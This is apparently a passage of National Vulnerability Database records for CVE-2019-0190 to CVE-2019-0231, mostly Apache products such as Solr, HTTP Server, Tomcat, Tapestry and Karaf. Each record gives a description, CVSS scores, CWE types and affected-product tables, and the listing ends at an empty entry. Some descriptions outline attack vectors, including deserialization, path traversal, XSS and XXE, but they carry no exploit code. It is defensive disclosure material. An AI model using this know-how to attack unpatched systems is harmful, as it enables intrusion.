nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-0190 MEDIUM

A bug exists in the way mod_ssl handled client renegotiations. A remote attacker could send a carefully crafted request that would cause mod_ssl to enter a loop leading to a denial of service. This bug can be only triggered with Apache HTTP Server version 2.4.37 when using OpenSSL version 1.1.1 or later, due to an interaction in changes to handling of renegotiation attempts.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle retail_xstore_point_of_service 7.1
oracle instantis_enterprisetrack 17.1
oracle instantis_enterprisetrack 17.2
oracle hospitality_guest_access 4.2.0
oracle hospitality_guest_access 4.2.1
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 7.0
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.37
CVE-2019-0191 MEDIUM

Apache Karaf kar deployer reads .kar archives and extracts the paths from the "repository/" and "resources/" entries in the zip file. It then writes out the content of these paths to the Karaf repo and resources directories. However, it doesn't do any validation on the paths in the zip file. This means that a malicious user could craft a .kar file with ".." directory names and break out of the directories to write arbitrary content to the filesystem. This is the "Zip-slip" vulnerability - https://snyk.io/research/zip-slip-vulnerability. This vulnerability is low if the Karaf process user has limited permission on the filesystem. Any Apache Karaf releases prior 4.2.3 is impacted.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
CVE-2019-0192 HIGH

In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
netapp storage_automation_store -
apache solr *
CVE-2019-0193 HIGH

In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,CWE-94,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache solr *
debian debian_linux 8.0
CVE-2019-0194 MEDIUM

Apache Camel's File is vulnerable to directory traversal. Camel 2.21.0 to 2.21.3, 2.22.0 to 2.22.2, 2.23.0 and the unsupported Camel 2.x (2.19 and earlier) versions may be also affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.23.0
CVE-2019-0195 HIGH

Manipulating classpath asset file URLs, an attacker could guess the path to a known file in the classpath and have it downloaded. If the attacker found the file with the value of the tapestry.hmac-passphrase configuration symbol, most probably the webapp's AppModule class, the value of this symbol could be used to craft a Java deserialization attack, thus running malicious injected Java code. The vector would be the t:formdata parameter from the Form component.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-0196 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.17 to 2.4.38. Using fuzzed network input, the http/2 request handling could be made to access freed memory in string comparison when determining the method of a request and thus process the request incorrectly.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
debian debian_linux 9.0
canonical ubuntu_linux 14.04
CVE-2019-0197 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.34 to 2.4.38. When HTTP/2 was enabled for a http: host or H2Upgrade was enabled for h2 on a https: host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. Server that never enabled the h2 protocol or that only enabled it for https: and did not set "H2Upgrade on" are unaffected by this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.2 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L 1.6 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
redhat jboss_core_services 1.0
oracle communications_session_report_manager 8.1.0
oracle enterprise_manager_ops_center 12.3.3
oracle communications_session_report_manager 8.2.0
oracle retail_xstore_point_of_service 7.1
oracle communications_session_route_manager 8.2.0
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 7.0
oracle http_server 12.2.1.3.0
opensuse leap 15.0
opensuse leap 42.3
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
oracle communications_session_route_manager 8.0.0
canonical ubuntu_linux 16.04
oracle communications_session_route_manager 8.1.0
fedoraproject fedora 30
oracle instantis_enterprisetrack 17.2
CVE-2019-0199 MEDIUM

The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0200 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J versions 6.0.0-7.0.6 (inclusive) and 7.1.0 which allows an unauthenticated attacker to crash the broker instance by sending specially crafted commands using AMQP protocol versions below 1.0 (AMQP 0-8, 0-9, 0-91 and 0-10). Users of Apache Qpid Broker-J versions 6.0.0-7.0.6 (inclusive) and 7.1.0 utilizing AMQP protocols 0-8, 0-9, 0-91, 0-10 must upgrade to Qpid Broker-J versions 7.0.7 or 7.1.1 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache qpid_broker-j *
apache qpid_broker-j 7.1.0
CVE-2019-0201 MEDIUM

An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper’s getACL() command doesn’t check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
oracle siebel_core_-_server_framework *
apache zookeeper 3.5.1
oracle timesten_in-memory_database *
debian debian_linux 9.0
oracle goldengate_stream_analytics *
apache zookeeper 3.5.2
debian debian_linux 8.0
netapp hci_bootstrap_os -
apache zookeeper 3.5.0
apache zookeeper *
apache zookeeper 3.5.4
redhat fuse 1.0.0
netapp element_software -
apache zookeeper 3.5.3
apache activemq 5.15.9
apache drill 1.16.0
CVE-2019-0202 MEDIUM

The Apache Storm Logviewer daemon exposes HTTP-accessible endpoints to read/search log files on hosts running Storm. In Apache Storm versions 0.9.1-incubating to 1.2.2, it is possible to read files off the host's file system that were not intended to be accessible via these endpoints.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-532,

Products Affected

Vendor Product Version
apache storm 0.9.2
apache storm 0.9.1
apache storm *
CVE-2019-0203 MEDIUM

In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion's svnserve server process may exit when a client sends certain sequences of protocol commands. This can lead to disruption for users of the server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-755,

Products Affected

Vendor Product Version
apache subversion 1.12.0
apache subversion *
CVE-2019-0204 HIGH

A specifically crafted Docker image running under the root user can overwrite the init helper binary of the container runtime and/or the command executor in Apache Mesos versions pre-1.4.x, 1.4.0 to 1.4.2, 1.5.0 to 1.5.2, 1.6.0 to 1.6.1, and 1.7.0 to 1.7.1. A malicious actor can therefore gain root-level code execution on the host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat fuse 7.5.0
apache mesos *
apache mesos 1.8.0
CVE-2019-0205 HIGH

In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when feed with specific input data. Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache thrift *
redhat jboss_enterprise_application_platform 7.2.0
CVE-2019-0207 MEDIUM

Tapestry processes assets `/assets/ctx` using classes chain `StaticFilesFilter -> AssetDispatcher -> ContextResource`, which doesn't filter the character `\`, so attacker can perform a path traversal attack to read any files on Windows platform.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-0210 MEDIUM

In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache thrift *
redhat jboss_enterprise_application_platform 7.2.0
CVE-2019-0211 HIGH

In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-416,CWE-416,

Products Affected

Vendor Product Version
redhat enterprise_linux_for_arm_64_eus 8.6_aarch64
canonical ubuntu_linux 18.10
redhat enterprise_linux_for_power_little_endian_eus 8.2_ppc64le
redhat enterprise_linux_for_power_little_endian_eus 8.4_ppc64le
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
redhat enterprise_linux_for_ibm_z_systems 8.0_s390x
redhat enterprise_linux_update_services_for_sap_solutions 8.1
redhat enterprise_linux_for_power_little_endian_eus 8.1_ppc64le
redhat jboss_core_services 1.0
fedoraproject fedora 28
redhat enterprise_linux_for_arm_64_eus 8.1_aarch64
oracle enterprise_manager_ops_center 12.3.3
redhat enterprise_linux_for_power_little_endian 8.0_ppc64le
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_server_tus 8.6
oracle retail_xstore_point_of_service 7.0
redhat enterprise_linux_server_tus 8.8
oracle http_server 12.2.1.3.0
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat enterprise_linux_for_arm_64_eus 8.4_aarch64
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_for_power_little_endian_eus 8.8_ppc64le
redhat openshift_container_platform_for_power 3.11_ppc64le
redhat enterprise_linux_for_ibm_z_systems_eus 8.4_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 8.2_s390x
oracle communications_session_route_manager 8.0.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
redhat enterprise_linux_update_services_for_sap_solutions 8.0
apache http_server *
oracle communications_session_route_manager 8.1.1
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_update_services_for_sap_solutions 8.6
oracle communications_session_report_manager 8.0.0
redhat enterprise_linux_eus 8.8
redhat enterprise_linux_update_services_for_sap_solutions 8.4
oracle communications_session_report_manager 8.1.0
oracle communications_session_report_manager 8.2.0
redhat enterprise_linux_for_arm_64 8.0_aarch64
redhat enterprise_linux_server_tus 8.4
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.8_s390x
redhat enterprise_linux_for_ibm_z_systems_eus 8.1_s390x
oracle communications_session_route_manager 8.2.0
redhat enterprise_linux_for_power_little_endian_eus 8.6_ppc64le
fedoraproject fedora 29
redhat enterprise_linux_server_aus 8.6
opensuse leap 15.0
redhat enterprise_linux_for_arm_64_eus 8.8_aarch64
redhat enterprise_linux_update_services_for_sap_solutions 8.8
opensuse leap 42.3
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
oracle communications_session_route_manager 8.1.0
redhat enterprise_linux_for_arm_64_eus 8.2_aarch64
redhat enterprise_linux_for_ibm_z_systems_eus 8.6_s390x
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
oracle instantis_enterprisetrack 17.2
redhat software_collections 1.0
redhat openshift_container_platform 3.11
CVE-2019-0212 MEDIUM

In all previously released Apache HBase 2.x versions (2.0.0-2.0.4, 2.1.0-2.1.3), authorization was incorrectly applied to users of the HBase REST server. Requests sent to the HBase REST server were executed with the permissions of the REST server itself, not with the permissions of the end-user. This issue is only relevant when HBase is configured with Kerberos authentication, HBase authorization is enabled, and the REST server is configured with SPNEGO authentication. This issue does not extend beyond the HBase REST server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hbase *
CVE-2019-0213 MEDIUM

In Apache Archiva before 2.2.4, it may be possible to store malicious XSS code into central configuration entries, i.e. the logo URL. The vulnerability is considered as minor risk, as only users with admin role can change the configuration, or the communication between the browser and the Archiva server must be compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva *
CVE-2019-0214 MEDIUM

In Apache Archiva 2.0.0 - 2.2.3, it is possible to write files to the archiva server at arbitrary locations by using the artifact upload mechanism. Existing files can be overwritten, if the archiva run user has appropriate permission on the filesystem for the target file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache archiva *
CVE-2019-0215 MEDIUM

In Apache HTTP Server 2.4 releases 2.4.37 and 2.4.38, a bug in mod_ssl when using per-location client certificate verification with TLSv1.3 allowed a client to bypass configured access control restrictions.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 30
fedoraproject fedora 29
apache http_server 2.4.37
apache http_server 2.4.38
CVE-2019-0216 LOW

A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-0217 MEDIUM

In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
fedoraproject fedora 28
netapp clustered_data_ontap -
oracle enterprise_manager_ops_center 12.3.3
canonical ubuntu_linux 12.04
canonical ubuntu_linux 14.04
oracle retail_xstore_point_of_service 7.1
redhat enterprise_linux_desktop 7.0
fedoraproject fedora 29
oracle retail_xstore_point_of_service 7.0
redhat enterprise_linux_workstation 7.0
oracle http_server 12.2.1.3.0
opensuse leap 15.0
netapp oncommand_unified_manager -
debian debian_linux 9.0
opensuse leap 42.3
oracle enterprise_manager_ops_center 12.4.0
debian debian_linux 8.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
redhat enterprise_linux -
redhat enterprise_linux_server 7.0
CVE-2019-0218 MEDIUM

A vulnerability was discovered wherein a specially crafted URL could enable reflected XSS via JavaScript in the pony mail interface.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache pony_mail *
CVE-2019-0219 HIGH

A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle retail_xstore_point_of_service 16.0.6
oracle instantis_enterprisetrack 17.1
oracle retail_xstore_point_of_service 17.0.4
apache cordova_inappbrowser *
oracle instantis_enterprisetrack 17.2
oracle retail_xstore_point_of_service 18.0.3
oracle instantis_enterprisetrack 17.3
oracle retail_xstore_point_of_service 19.0.2
CVE-2019-0220 MEDIUM

A vulnerability was found in Apache HTTP Server 2.4.0 to 2.4.38. When the path component of a request URL contains multiple consecutive slashes ('/'), directives such as LocationMatch and RewriteRule must account for duplicates in regular expressions while other aspects of the servers processing will implicitly collapse them.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-706,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
opensuse leap 15.0
debian debian_linux 9.0
opensuse leap 42.3
fedoraproject fedora 28
debian debian_linux 8.0
canonical ubuntu_linux 16.04
canonical ubuntu_linux 14.04
fedoraproject fedora 30
fedoraproject fedora 29
CVE-2019-0221 MEDIUM

The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0222 MEDIUM

In Apache ActiveMQ 5.0.0 - 5.15.8, unmarshalling corrupt MQTT frame can lead to broker Out of Memory exception making it unresponsive.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache activemq *
debian debian_linux 9.0
netapp e-series_santricity_web_services -
oracle enterprise_manager_base_platform 13.2.0.0.0
oracle communications_diameter_signaling_router 8.1
oracle goldengate_stream_analytics *
oracle enterprise_manager_base_platform 13.3.0.0.0
oracle enterprise_repository 12.1.3.0.0
oracle identity_manager_connector 9.0
oracle communications_diameter_signaling_router 8.2.1
oracle enterprise_manager_base_platform 12.1.0.5.0
oracle communications_diameter_signaling_router 8.0.0
oracle communications_diameter_signaling_router 8.2
CVE-2019-0223 MEDIUM

While investigating bug PROTON-2014, we discovered that under some circumstances Apache Qpid Proton versions 0.9 to 0.27.0 (C library and its language bindings) can connect to a peer anonymously using TLS *even when configured to verify the peer certificate* while used with OpenSSL versions before 1.1.0. This means that an undetected man in the middle attack could be constructed if an attacker can arrange to intercept TLS traffic.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_aus 6.4
redhat openstack 13
redhat enterprise_linux_eus 7.6
redhat enterprise_linux_eus 7.4
redhat satellite 6.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
redhat enterprise_linux_server_aus 7.3
redhat jboss_amq_clients_2 -
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_eus 7.5
apache qpid *
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_aus 6.5
redhat satellite 6.3
redhat openstack 14
redhat enterprise_linux_eus 6.7
redhat enterprise_linux_server_tus 7.2
redhat satellite 6.5
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 6.6
redhat enterprise_linux_server 7.0
CVE-2019-0224 MEDIUM

In Apache JSPWiki 2.9.0 to 2.11.0.M2, a carefully crafted URL could execute javascript on another user's session. No information could be saved on the server or jspwiki database, nor would an attacker be able to execute js on someone else's browser; only on its own browser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-0225 HIGH

A specially crafted url could be used to access files under the ROOT directory of the application on Apache JSPWiki 2.9.0 to 2.11.0.M2, which could be used by an attacker to obtain registered users' details.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-0226 MEDIUM

Apache Karaf Config service provides a install method (via service or MBean) that could be used to travel in any directory and overwrite existing file. The vulnerability is low if the Karaf process user has limited permission on the filesystem. Any Apache Karaf version before 4.2.5 is impacted. User should upgrade to Apache Karaf 4.2.5 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
CVE-2019-0227 MEDIUM

A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
oracle communications_design_studio 7.3.4.3.0
apache axis 1.4
oracle communications_order_and_service_management 7.3.0.0.0
oracle communications_design_studio 7.4.0.4.0
oracle secure_global_desktop 5.4
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle internet_directory 12.2.1.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle communications_design_studio 7.4.1.1.0
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
oracle flexcube_core_banking 11.10.0
oracle primavera_unifier *
oracle primavera_gateway 17.12.6
oracle tuxedo 12.1.1.0.0
oracle communications_element_manager 8.1.0
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle tuxedo 12.1.3
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle flexcube_core_banking 11.9.0
oracle webcenter_portal 12.2.1.3.0
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle big_data_discovery 1.6
oracle communications_design_studio 7.3.5.5.0
oracle communications_session_route_manager 8.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle internet_directory 12.2.1.4.0
oracle knowledge *
oracle endeca_information_discovery_studio 3.2.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle flexcube_private_banking 12.1.0
oracle financial_services_compliance_regulatory_reporting *
oracle communications_session_route_manager 8.1.1
oracle financial_services_analytical_applications_infrastructure *
oracle peoplesoft_enterprise_human_capital_management_human_resources 7.3.6
oracle communications_order_and_service_management 7.4
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
oracle hospitality_guest_access 4.2.1
oracle application_testing_suite 13.2.0.1
oracle communications_session_report_manager 8.1.0
oracle real-time_decision_server 3.2.1.0
oracle communications_element_manager 8.0.0
oracle peoplesoft_enterprise_human_capital_management_human_resources 9.2
oracle communications_session_report_manager 8.2.0
oracle primavera_unifier 16.2
oracle rapid_planning 12.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle communications_asap_cartridges 7.2
oracle retail_xstore_point_of_service 7.1
oracle peoplesoft_enterprise_human_capital_management_human_resources 7.3.5
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle retail_order_broker 15.0
oracle communications_network_integrity 7.3.6
oracle communications_asap_cartridges 7.3
oracle communications_session_report_manager 8.1.1
oracle retail_order_broker 16.0
oracle financial_services_funds_transfer_pricing *
oracle agile_product_lifecycle_management_framework 9.3.3
oracle communications_element_manager 8.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle primavera_gateway 16.2.11
oracle communications_session_route_manager 8.1.0
oracle flexcube_core_banking 11.8.0
oracle instantis_enterprisetrack 17.2
oracle retail_order_broker 18.0
oracle flexcube_core_banking 11.7.0
oracle rapid_planning 12.2
oracle communications_network_integrity 7.3.5
CVE-2019-0228 HIGH

Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle webcenter_sites 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.5
oracle banking_corporate_lending_process_management 14.3
oracle retail_xstore_point_of_service 17.0
oracle hyperion_financial_reporting 11.2.6.0
oracle banking_virtual_account_management 14.5
oracle banking_virtual_account_management 14.2
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_xstore_point_of_service 18.0.3
fedoraproject fedora 29
oracle retail_xstore_point_of_service 16.0.6
oracle banking_trade_finance_process_management 14.3
oracle banking_credit_facilities_process_management 14.5
oracle banking_trade_finance_process_management 14.5
oracle banking_corporate_lending_process_management 14.2
oracle banking_trade_finance_process_management 14.2
apache james 3.4.0
oracle banking_credit_facilities_process_management 14.2
oracle hyperion_financial_reporting 11.1.2.4
oracle banking_supply_chain_finance 14.3
apache james 3.3.0
fedoraproject fedora 30
oracle webcenter_sites 12.2.1.3.0
oracle banking_supply_chain_finance 14.2
apache pdfbox 2.0.14
oracle communications_messaging_server 8.1
oracle banking_virtual_account_management 14.3.0
oracle banking_supply_chain_finance 14.5
oracle banking_credit_facilities_process_management 14.3
CVE-2019-0229 MEDIUM

A number of HTTP endpoints in the Airflow webserver (both RBAC and classic) did not have adequate protection and were vulnerable to cross-site request forgery attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-0230 HIGH

Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1321,

Products Affected

Vendor Product Version
apache struts *
oracle communications_policy_management 12.5.0
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle financial_services_data_integration_hub 8.0.3
oracle mysql_enterprise_monitor *
oracle financial_services_data_integration_hub 8.0.6
CVE-2019-0231 MEDIUM

